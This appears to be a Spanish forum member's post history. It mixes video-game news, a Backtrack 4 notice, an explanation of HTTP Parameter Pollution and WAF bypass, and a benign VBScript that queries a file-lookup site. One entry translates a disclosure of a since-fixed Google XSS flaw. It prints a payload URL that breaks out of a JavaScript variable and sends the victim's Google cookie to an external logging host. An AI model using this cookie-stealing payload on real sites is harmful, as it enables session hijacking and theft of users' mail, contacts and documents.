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Tema destacado: Curso de javascript por TickTack


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181  Media / Juegos y Consolas / Mision imposible ... y no el juego ... sino encontrar otro en: 8 Julio 2009, 18:25 pm
Buenas ...

De casualidad me he encontrado con unos juegos que me han recordado a otro que jugaba hace unos años, el cual ahora no puedo encontrar  :P

Los juegos que me lo han recordado son Pocket Tanks y Atomic Cannon:



En definitiva ... un jueguito de tanques que se podía jugar de a dos, al estilo de Worms, tenías diferentes misiles y balas, pero bueno un poco más rudimentario ya que como dije ... lo jugaba hace unos años atrás ... en un win 95 ... digamos unos 10 años  :silbar:

Alguien tiene idea de como se podía llamar?  ;D

Saludos
182  Media / Juegos y Consolas / Fuel: El juego más grande del mundo (Guinness) en: 3 Junio 2009, 20:23 pm
 Luego de los continuos fracasos de la serie Need For Speed tuvimos que empezar a mirar a otro lado para conseguir un juego de carreras que nos sorprenda y nos divierta. Una de las tantas empresas que llenó ese rol fue Codemasters, quienes a principios de junio tienen pensado traernos un juego de carreras post-apocalítptico tan ambicioso que marcó un récord por el mundo más grande en un videojuego de consolas. 14,400 km² de pura exploración.

Codemaster nos ha demostrado en otras ocasiones que pueden hacer juegos de coches. Estos son los muchachos que hicieron GRID, ¿debo decir algo más? Resulta ser que, aunque hacer el mismo juego con algunas mejoras podría haberles sido muy rentable, esta vez decidieron ir un poco más allá y crear algo nuevo. Es por eso que designaron a la desarrolladora francesa, Asobo Studio, para que produzca su próximo gran juego de carreras. Por lo que hemos visto, Fuel no solo se verá de maravilla, sino que ya, a medio mes de su salida, logró un récord Guinness por el juego de consolas con el mundo abierto más grande de la historia. ¿Quién dice que el tamaño no importa?
 
 Seguramente estas pensando, ¿cómo puede ser que un juego de carreras tenga el mundo más grande? Pues así como escuchas, Fuel será un juego de carreras post-apocalíptico con un mundo arrasado por el calentamiento global. Es decir, una especie de Fallout con autitos. Obviamente no habrá mucho que hacer en pie y aún no sabemos si se podrá salir del vehículo, pero lo que sí sabemos es que tendremos cerca de 14,400 km², para explorar a gusto.


 El hecho de que sea un mundo post-apocalíptico no es solo un fondo para hacer del mundo algo más interesante, sino que entrará en juego con enormes tornados y tormentas de arena, entre otros desastres meteorológicos. Además, habrá un ciclo de noche y día, lo que garantiza que nunca sabrás cuando puede venir la próxima tormenta, sino que será completamente aleatorio. Ya podemos imaginar lo divertido que será correr una carrera en plena noche, acompañado con un lindo tornado.
 
 Los desarrolladores han garantizado que, aunque este es el mundo más grande que hemos visto, Fuel no tendrá ningún tiempo de carga entre zonas, lo que garantiza horas de juego con una fluidez sin igual.Y para darnos una idea de lo enorme que es el terreno, Codemaster dijo que el mapa es más grande que Hong Kong, Singapur, Santa Lucia y la Isla de Man, sumadas… es decir, muy, pero muy, pero muuuuuy grande. Muy…

Podrá no verse tan bien como GRID, pero Fuel promete muchas más emociones... ¡y tornados!

 Y para recorrer esos truculentos caminos tendremos a nuestra disposición una buena variedad de vehículos, divididos en seis clases diferentes. Desde motos, vehículos todo terreno, Muscle Cars (de alto rendimiento) y deportivos, hasta buggies, camiones y aerodeslizadores. Es decir que habrá variedad para todos los gustos, lo que siempre es bienvenido.
 
 Lamentablemente aún no sabemos tanto como querríamos, pero si nos guiamos por lo que Codemasters nos ha acostumbrado, podemos esperar un juego de carreras con muy buenos gráficos y una jugabilidad muy accesible, pero a la vez satisfactoria. Posiblemente no intente ser realista en el manejo y la física de los vehículos, pero tendrá varios elementos que intentarán aumentar la realidad del juego en general.

 Es raro que tan cerca de la salida no tengamos más información, pero parece que Codemaster quiere darnos una sorpresa. Con fecha de salida para el 2 de junio en Xbox 360 y PlayStation 3, seguida por la de PC semanas luego, ya podemos saborear la arena del mundo post-apocalíptico que han preparado para nosotros.

Fuente:http://www.neoteo.com/fuel-el-juego-mas-grande-del-mundo-guinness-15993.neo
183  Seguridad Informática / Nivel Web / Seguridad Web: HTTP Parameter Pollution en: 21 Mayo 2009, 16:04 pm
Por todos es conocido que los servidores web son uno de mayores objetivos de los ataques de hoy en día. El dinero y los datos accesibles a través de los portales web, con la finalidad de ofrecer un servicio, una vez más, se ven afectados por una nueva amenaza, un nuevo tipo de ataque.

En concreto, esta nueva técnica ha sido expuesta durante la conferencia OWASP Appsec Poland 2009 por parte de los expertos en seguridad Stefano Di Paola y Luca Carettoni y ha llegado en modo de correo a los suscritos a Bugtraq.

¿En qué consiste el ataque?
Pues una vez más (como sucede con un SQL Injection o una inyección de comandos) en la reacción que tiene el servidor web ante la manipulación de algún parámetro o cabecera en una aplicación web.

En este caso, consiste en la interpretación que tiene un servidor web cuando se repite el nombre de un parámetro dentro de la misma petición. Un ejemplo:

http://www.miaplicacion.com/index.asp&variable1=val1&variable2=val2

En este caso, cada variable recibiría su valor correcto por parte del servidor web y todo OK.

Sin embargo, supongamos que http://www.miaplicacion.com/index.asp&variable1=val1&variable1=val2

¿Qué valor tendría variable1 esta vez? Pues la respuesta es: depende del servidor web que lo interprete. Unos servidores asignarán el val1 y otros asignarán val2. En otros casos como IIS, su mecanismo interno los concatenará.

Por ejemplo, IIS se sabe que los concatena separándolos por comas. Apache solamente se queda con el primer valor que recibe un parámetro desechando el resto.

El impacto de este comportamiento por parte de los servidores Web puede ser enorme a la hora de procesar los argumentos, y puede dar lugar a múltiples posibilidades como sobreescritura de parámetros HTTP definidos por la aplicación en la URI, alteración del comportamiento de la aplicación, acceso y modificación de variables,... etc

Algo muy interesante es que aquellas empresas que como medidas preventivas de protección de sus aplicaciones web tengan un WAF (Web Application Firewall), que les permita sanitizar la entrada de las peticiones entrantes, tampoco estarán protegidas del todo.

En líneas generales, los Firewalls de Aplicaciones Web analizan las peticiones web basándose en firmas generalmente. Estas firmas son expresiones regulares que enfrentan contra las peticiones (los parámetros, las cabeceras, incluso el cuerpo de la página, etc...) de manera que, como si de un antivirus se tratara, si alguna de las "cadenas" coincide con la petición, la misma es bloqueada. Ahora bien, aprovechando esta nueva línea de ataque, es posible encapsular en la misma variable (repetida varias veces con diferente valor) un ataque, que si fuera en una sola variable, sería fácilmente detectada y bloqueada por cualquier WAF. De esta manera, al analizar cada parámetro, no se delimitaría como algo maliciosa la petición y sin embargo, al ser reensamblada e interpretada por el servidor web, sí que podría ser un riesgo en la seguridad de la aplicación.

Aquellos WAFs que no estén basados en tecnología de reverse proxy (proxy inverso) permitirán ser bypasseados ante este tipo de ataque.

Como ya indicamos en posts(1) anteriores( y 2), existe algún Firewall de Aplicaciones Web con un motor basado en ponderar los valores de los diferentes parámetros (con un funcionamiento parecido a un antispam) que en algunos de estos casos sería completamente efectivo (scoring list) además de porque está basado en tecnología de proxy inverso y en Apache, que como hemos visto sólo se quedaba con el primer valor asignado a un parámetro, reenviando sólo este valor al servidor final.

La presentación completa puede ser descargada aquí así como vista en Slideshare. Su lectura es altamente recomendable.

Fuente:http://www.securitybydefault.com/2009/05/seguridad-web-http-parameter-pollution.html
184  Seguridad Informática / Nivel Web / Vulnerabilidad XSS Universal en todos los Servicios Google ... en: 11 Mayo 2009, 15:57 pm
Vulnerabilidad XSS Universal en todos los Servicios Google puede comprometer su información personal

Vulnerabilidad Reportada: 18-Abril-2009 9.33 pm
Respuesta de Google: 18-Abril-2009 10.19 pm (Wow! eso es súper rápido para un sábado :))
Vulnerabilidad Reparada: 05-Mayo-2009 7.05 pm
Cambio Propagado: 07-Mayo-2009 3.19 pm

Recientemente informé de una falla cross-scripting (XSS) a Google, que ahora ya está arreglada. La vulnerabilidad existía en el Script Python del Soporte de Google en donde una URL maliciosa no era depurada del caracter XSS ' (comilla simple) antes de ponerlo dentro de la variable logURL de javascript. Como resultado, era posible romper el encapsulamiento de la declaración var y ejecutar comandos javascript arbitrarios en el dominio principal Google.com.

La única limitación eran los siguientes caractéres que eran o bien filtrados o codificados para url - " (comillas dobles) < > (espacio) { }. Sin embargo, esta protección podía ser sorteada fácilmente. Puede escribir un comando javascript para robar cookies de sesión [gracias a que caractéres como ' ; . ( ) / = +aún estaban disponibles] y enviarlos a mi sitio malicioso. Vea el ejemplo que se da abajo.

Su cookie del dominio Google.com es el cookie central de autenticación única (SSO) para todos los servicios google. Una vez que alguien cualquiera lo obtenga, él o ella pueden usarlo para

1. Robarle sus emails.
2. Robarle sus contactos.
3. Robarle sus documentos.
4. Robarle sus código.
5. Robarle sus sitios.
6. Robarle sus website analytics.
7. Poner una entrada trasera en su página de inicio de iGoogle con gadgets maliciosos.
…. y deben haber aun varias cosas más que quedan con las que podrían jugar.

Un código de una sencilla Prueba de Concepto puede mostrar su cookie de Google.com en un cuadro de alerta:

http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g

Un ejemplo más de la vida real donde un atacante silenciosamente transfiere su cookie Google.com a su sitio maligno:-

http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';ifr=document.createElement('iframe');ifr.src='http:'+'//www.securethoughts.com/security/cookielogger/log.cgi?cookie='+escape(document.cookie);document.body.appendChild(ifr);//src=cb&lev=index

Quiero agradecer al equipo de Seguridad de Google por sus rápidas respuestas y arreglo a este serio problema en tiempo y forma. Si piensa que Google se tomó mucho tiempo para arreglar esta vulnerabilidad, piénselo de nuevo. Este script de python es usado en muchos lugares. Intente esta soncera en Google para ver el uso de este script en casi todos los Servicios Google.

Fuente:http://securethoughts.com/2009/05/universal-xss-vulnerability-in-all-google-services-can-compromise-your-personal-information/
Traducción para Segu-info:http://blog.segu-info.com.ar/2009/05/vulnerabilidad-xss-universal-en-todos.html
185  Programación / Scripting / filnspect [VBS] en: 5 Mayo 2009, 18:19 pm
Buenas ...

Bueno, hace un tiempo y tras una consulta en el sub de seguridad se me ocurrió crear un pequeño script para consultar de manera automática sobre el origen de determinados archivos/librerías, para lo cual hacía uso de la web :http://www.fileinspect.com/, la cual esta en beta para ya muestra tener una buena bbdd :P

El caso es que en ese momento el script fue resultado de algunos minutos de aburrimiento, pero luego de analizarlo un poco más detenidamente me pareció que me podía resultar útil, así que lo he ido modificando en mi beneficio :D y lo comparto a continuación :P

Código
  1. 'by Novlucker
  2. Set objxmlHTTP = CreateObject("Microsoft.XMLHTTP")
  3. Set objfso = Createobject("Scripting.filesystemobject")
  4.  
  5. If wscript.arguments.count <> 2 then
  6. Ayuda()
  7. End if
  8.  
  9. Format = Ucase(wscript.arguments(0))
  10.  
  11. Select case Format
  12. case "/F"
  13. Set FromFolder = objfso.getfolder(wscript.arguments(1))
  14. Set FileList = FromFolder.files
  15. If FileList.count = 0 then
  16. Msgbox "La carpeta seleccionada no contiene ningún archivo", 64, "Informe"
  17. wscript.quit
  18. End if
  19. case "/A"
  20. If objfso.fileexists(wscript.arguments(1)) then
  21. Set FromFile = objfso.opentextfile(wscript.arguments(1),1)
  22. FileList = Split(FromFile.readall,vbnewline)
  23. FromFile.close
  24. Else
  25. Msgbox "El archivo seleccionado no existe", 16, "Informe"
  26. wscript.quit
  27. End if
  28. case "/L"
  29. FileList = Split(wscript.arguments(1),",")
  30. case "/P"
  31. Set Taskmgr = GetObject("winmgmts:{impersonationLevel=impersonate}").ExecQuery ("select * from Win32_Process")
  32. Dim Taskname(): Redim Preserve Taskname(Taskmgr.count-1)
  33. For Each T in Taskmgr
  34. Taskname(n) = T.name
  35. n = n+1
  36. Next
  37. FileList = FilterAray(Taskname)
  38. case else
  39. Ayuda()
  40. End Select
  41.  
  42. For Each F in FileList
  43.  
  44. If Format = "/F" then
  45. URLF = "http://www.fileinspect.com/fileinfo/" & LCase(Replace(F.name,".","-"))
  46. F = F.name
  47. Else
  48. URLF = "http://www.fileinspect.com/fileinfo/" & LCase(Replace(F,".","-"))
  49. End if
  50.  
  51. objxmlHTTP.open "GET", URLF, 0
  52. objxmlHTTP.send()
  53. Do while objxmlHTTP.readystate <> 4
  54. wscript.sleep 200
  55. Loop
  56. response = objxmlHTTP.responsetext
  57.  
  58. blogcopy = instr(1,response,"id=""blog-copy-text""",1)
  59.  
  60. If blogcopy > 0 then
  61. Startd = instr(blogcopy, response,">",1)+1
  62. Endd = instr(Startd, response,"<",1)
  63.  
  64. Definition = mid(Response,Startd,Endd-Startd)
  65. Definition = replace(Definition,"&lt;", "<")
  66. Definition = replace(Definition,"&gt;", ">")
  67. Definition = replace(Definition,"&quot;", """")
  68.  
  69. wscript.echo Definition
  70. Else
  71. wscript.echo "</p><table cellpadding=""0"" cellspacing=""0"" width=""100%"" bgcolor=#737CA1><tr><td><a style=""color:#000000;font-size:15px;color=white;text-decoration:none;font-family:Arial;border:0px;""<b>" & F & ": Archivo desconocido</b></a></td></tr></table>"
  72. End if
  73.  
  74. Next
  75.  
  76. Function FilterAray(Aray)
  77. dim auxAray()
  78. For Each A in Aray
  79. Match = False
  80. On error resume next
  81. Newlength = ubound(auxAray) + 1
  82. If err.number > 0 then
  83. Redim Preserve auxAray(0)
  84. auxAray(0) = A
  85. err.clear
  86. On error goto 0
  87. End if
  88. For Each E in auxAray
  89. If A = E then
  90. Match = True
  91. Exit For
  92. End if
  93. Next
  94. If Match = False then
  95. Redim Preserve auxAray(Newlength)
  96. auxAray(Newlength) = A
  97. End if
  98. Next
  99. FilterAray = auxAray
  100. End Function
  101.  
  102. Sub ayuda()
  103. wscript.echo vbnewline & "Uso: cscript.exe/nologo " & wscript.scriptname & " [formato] [parametro]" & vbnewline & _
  104. vbnewline & chr(9) & "Formato" & chr(9) & "Parametro" & vbnewline & chr(9) & "/F" & chr(9) & "Ruta Carpeta" & vbnewline & _
  105. chr(9) & "/A" & chr(9) & "Ruta Archivo (Conteniendo listado)" & vbnewline & chr(9) & "/L" & chr(9) & "Lista de archivos separados por coma" & vbnewline & _
  106. chr(9) & "/P" & chr(9) & "Análisis de procesos en ejecución (Cualquier valor)" & vbnewline & vbnewline & "Ejemplos:" & vbnewline & chr(9) & "cscript.exe/nologo " & _
  107. wscript.scriptname & " /F" & " C:\WINDOWS" & vbnewline & chr(9) & "cscript.exe/nologo " & wscript.scriptname & " /A" & _
  108. " C:\Archivos.txt" & vbnewline & chr(9) & "cscript.exe/nologo " & wscript.scriptname & " /L" & " ""mstsc.exe,syskey.exe,appmgr.dll""" & _
  109. vbnewline & chr(9) & "cscript.exe/nologo " & wscript.scriptname & " /P -"
  110. wscript.quit
  111. End Sub

El script debe de lanzarse desde línea de comandos pasando los parámetros correspondientes, los cuales pueden verse en la ayuda (tanto desde ms-dos como con doble click)

Ej:
Código
  1. C:\Documents and Settings\Novlucker\Escritorio>cscript//nologo "filnspect.vbs" > Reporte.html

Como se ve además hay que redireccionar la salida (>) a un archivo de extensión html

Así se ve el resultado:

Saludos ;D

Post original: Error de permisos al modificar msconfig

Edito
:La web bajo la cual se realizaban las consultas, ha cambiado MUCHO la manera en la que se visualizan los archivos, por lo que ha dejado de ser funcional  :-\
186  Media / Juegos y Consolas / Dolphin: Emulador de Wii y GameCube en: 6 Marzo 2009, 12:27 pm
En estos tiempos no hay nadie que pueda negar que la consola Nintendo Wii es la más vendida del mercado. Su bajo costo en comparación con la competencia, su afinidad con el jugador casual y su control revolucionario han hecho que la Wii superara de manera aplastante tanto a las consolas actuales como a su antecesora GameCube, cuando en realidad su hardware no se diferencia mucho de ella. Pero el campo de la emulación siempre está presente, y si bien sus pasos suelen ser lentos, hace poco dio uno muy grande. Dolphin es para muchos el mejor emulador de Wii que existe, y ha alcanzado un estatus muy importante: Además de correr varios juegos, puede iniciar el sistema operativo de la consola.

Desde que el código del emulador fue publicado, ha ganado mucho terreno en relación a sus primeras versiones. Como todo emulador iniciado, tanto el rendimiento como la compatibilidad del mismo dejaban mucho que desear. Además, las primeras versiones estaban especialmente optimizadas para sistemas operativos de 64 bits, lo cual resultó ser un problema para la gran mayoría de los usuarios que querían probar el emulador. Ahora existen versiones de 32 y 64 bits, tanto para plataformas Windows como para plataformas Linux.


Las opciones de configuración del emulador son varias, y no todas funcionan en todos los juegos, por lo que hay que tener especial cuidado. Lo que puede hacer que un título funcione a la perfección, puede provocar que otro ni siquiera se inicie. De todas formas, como el emulador de código abierto que es, estamos lidiando con un trabajo en progreso. La última versión oficial del emulador fue lanzada hace tres días, pero también existen "builds no oficiales", que poseen alguna clase de optimización o que solucionan un bug específico. Demás está decirlo, los requerimientos de hardware son significativamente altos. Cuanta más RAM, más procesador y más tarjeta de vídeo posean, más podrán combatir las pérdidas de velocidad que presentan algunos juegos. Aquí dejamos un vídeo que encontramos en YouTube con una vieja versión de Dolphin corriendo Metroid Prime 3: Corruption, y en la descripción del vídeo podrán ver el hardware que se utilizó.


De todas formas, hay que reconocer el progreso del emulador. La última versión disponible ha logrado incluso iniciar el sistema operativo de la consola Wii, previa extracción del mismo desde la consola, por supuesto. Dolphin es un emulador, y si llegara a tener una porción de código de la Wii, no duraría mucho con la gran N persiguiéndolo. En cuanto al listado de juegos, la compatibilidad con GameCube es mucho mayor que con la Wii, pero la cosa va cambiando. Si tienes algún juego de estas consolas a la mano, consulta el listado en la página oficial y prueba a jugarlo. Que el juego no esté en la lista no significa que no funcione, así que lo ideal es comprobar el funcionamiento por uno mismo. Observa estas imágenes de la versión para Wii de Resident Evil.

      

      

El hardware disponible en estos días posee un poder de procesamiento excelente, pero como en todos los casos de emulación, el rendimiento final depende mucho del código implementado en el emulador mismo. Dolphin ha avanzado mucho, y puede correr muy buenos juegos sin problemas, pero todavía tiene un gran tramo por delante. Esperamos que siga progresando a buen ritmo, y no se encuentre ninguna piedra en el camino.

Página oficial:
Código:
http://www.dolphin-emu.com/news.php
Fuente:
Código:
http://www.neoteo.com/dolphin-emulador-de-wii-y-gamecube-15028.neo
187  Seguridad Informática / Hacking / Backtrack 4 beta en: 3 Febrero 2009, 11:45 am
Buenas

Pues eso, ha salido la beta de Backtrack 4, y aunque por el momento no la he encontrado para descarga, al menos son nuevas noticias acerca de esta distro  :P





               

               

               


Info y News de esta versión (nuevo blog)
Código:
http://backtrack4.blogspot.com/2009/01/backtrack-4-almost-out-of-oven.html

Saludos ;D
188  Media / Juegos y Consolas / Nueva asignatura universitaria, StarCraft en: 29 Enero 2009, 19:42 pm
Citar
por : Jesús Maturana: 29 Ene 2009, 17:40

La Universidad de Berkeley concede créditos por la asignatura relacionada con el juego de estrategia en tiempo real de Blizzard StarCraft.

StarCraft es un, ya antiguo, juego de estrategia en tiempo real, con el que teniendo en cuenta el espíritu del original WarCraft, se usó la temática espacial. Pues a día de hoy se ha anunciado que el juego ha hecho acto de presencia en la Universidad, dado que en la Universidad de Berkeley (California) se impartirá una asignatura sobre él.

No es una asignatura a tomarse a broma, dado que tanto el temario como el esfuerzo para comprender cómo se desarrollan las batallas en el juego, exigen conocimentos de ecuaciones diferenciales y de cálculo avanzado. A continuación os dejamos tanto el temario como la página de la asignatura, que tan sólo tiene un cupo de 60 alumnos.

Vinculos
Código:
http://michaelo.phswebs.com/BerkeleyStarcraft/
http://michaelo.phswebs.com/BerkeleyStarcraft/syllabus.html

Fuente:
Código:
http://www.theinquirer.es/2009/01/29/nueva-asignatura-universitaria-starcraft.html
189  Media / Juegos y Consolas / Global Game Jam: 48 horas de desarrollo en: 29 Enero 2009, 18:47 pm
Citar
Lo que parece una misión para un Jack Bauer de vacaciones, en realidad es un evento mundial de desarrollo acelerado de juegos. Global Game Jam reta a los aficionados de todo el mundo a crear un juego completo en solo dos días. Con España como participante, esto es como una olimpiada de creativos y programadores, que se llevará a cabo del 30 de enero al 1 de febrero. TIC TAC TIC TAC

Este fin de semana (del 30 de enero al 1 de febrero) desarrolladores de videojuegos de todo el mundo participarán en una misión que, si bien no imposible, sí mucho muy difícil: desarrollar un juego completo en solo 48 horas. Más de 1.500 entusiastas, entre los que se cuentan estudiantes, autodidactas y expertos de la industria, han escuchado la llamada y se aprontan para la batalla contra los segundos. Mucha cafeína en una iniciativa de la IDGA (International Game Developers Association) que, como se describe en el sitio oficial de España,  será “un encuentro intenso y emocionante entre aficionados a la creación de videojuegos.”


Citar
“Los objetivos de este encuentro son divertirse y crear juegos experimentales que resulten originales e innovadores.”, se aclara, y Kyle Gabler (desarrollador del genial World of Goo), detalla: “La siguiente gran transformación en el mundo de los juegos no vendrá de un estudio grande, con equipos que cuestan millones de dólares y gigantescos presupuestos para marketing, vendrá de un chico que en su dormitorio y con algún software gratuito y una inacabable provisión de cafeína y motivación, construirá los comienzos para algunos de los mejores próximos juegos y lo hará en solo 48 horas.” Por su parte, Susan Gold, una de los jurados, agrega que “el próximo Will Wright, Warren Spector o Kyle Gabler puede mostrar sus creaciones en este evento y será para él un momento que definirá su carrera.”

¿Demasiados optimistas? Nosotros les creemos. IGDA es una asociación con mucho prestigio dentro del desarrollo independiente de juegos y las empresas que patrocinan el evento agregan ese ápice de apoyo monetario que todo  creativo necesita. Take-Two Interactive, Unity y GameRecruiter (una bolsa de trabajo para desarrolladores) apoyan el evento, lo que no es poco. De todas formas, hay que entender que “Global Game Jam no es una competición sino un espacio para fomentar la creatividad, intercambiar ideas y pasar un fin de semana intenso con gente apasionada por el desarrollo de videojuegos.”, como dice su sitio oficial.

Por supuesto que habrá una selección de los mejores juegos, de parte de los jurados y los mismos participantes. Pero lo “único” que ganarán los valientes que logren las primeras posiciones será prestigio, el amor incondicional de las mujeres y una exposición impagable en la industria. Ah, y si eres de España podrás hacerte con consola de última generación y/o una licencia de Autodesk Mudboox 2009. Los juegos desarrollados en el evento, por último, siempre le pertenecerán a sus creadores, pero IDGA se reserva el derecho de mostrarlos en su sitio. Exposición, tío.
Fuente:
Código:
http://www.neoteo.com/global-game-jam-48-horas-de-desarrollo-14658.neo

Saldrá algo interesante, o será todo al estilo tetris, pacman y pinball? Reconozco que son juegos históricos, pero los tiempos han cambiado ;D

Saludos
190  Media / Juegos y Consolas / YouTube Street Fighter en: 21 Enero 2009, 11:47 am
Citar
Por:  Max Ferzzola   @  miércoles, 21 de enero de 2009

¿Alguna vez pensaste que podrías jugar Street Fighter en YouTube? Nosotros, por lo menos, no. Pero con la llegada de las anotaciones las posibilidades de incluir contenido interactivo en los contenidos audiovisuales se ha ampliado. Decenas de vídeos las incorporaron para hacer historias interactivas, utilizando la posibilidad de enlazar a páginas externas. Piénsalo como un elige tu propia aventura, en vídeo. YouTube Street Fighter va un poco más allá y, sin ser una genialidad, sí podría entenderse como un esbozo de las cosas por venir.

La llegada de las anotaciones en YouTube abrió un amplio marco para los uploaders con imaginación. Están aquellos que simplemente subtitulan o comentan cosas de los vídeos, no faltan los que hacen publicidad así como los que se la curran un poco más y han generado verdaderas y excelentes aventuras interactivas. Las posibilidades de las anotaciones, sin embargo, todavía se están explorando. Y Youtube Street Fighter es un paso adelante, un experimento, que arroja un vistazo sobre lo que podrían ser los vídeos interactivos del futuro si siguen evolucionando.


Citar
Jugar es tan simple como elegir un luchador y, cuando comienza la pelea, pinchar sobre los íconos que representan los golpes (a la izquierda). Cada clic que realices te llevará a un nuevo vídeo, donde se muestra un resultado. Con los casi 120 vídeos que completan el juego y tres luchadores que elegir, esta curiosidad es un proyecto más que encomendable.

YouTube Street Fighter fue filmado por Patrick Boivin, un cineasta francés canadiense autodidacta, por encargo de Sota Toys, compañía que posee los derechos de los muñecos de acción de los luchadores de la serie. Lo que ves en esta versión de Street Fighter no es animación por ordenador, sino “stop motion”. Publicidad interactiva, viral, divertida y original que ya lleva casi un millón de vistas. ¡Puntos para Sota Toys por entender de qué va la cosa!

Fuente:
Código:
http://www.neoteo.com/youtube-street-fighter-14582.neo
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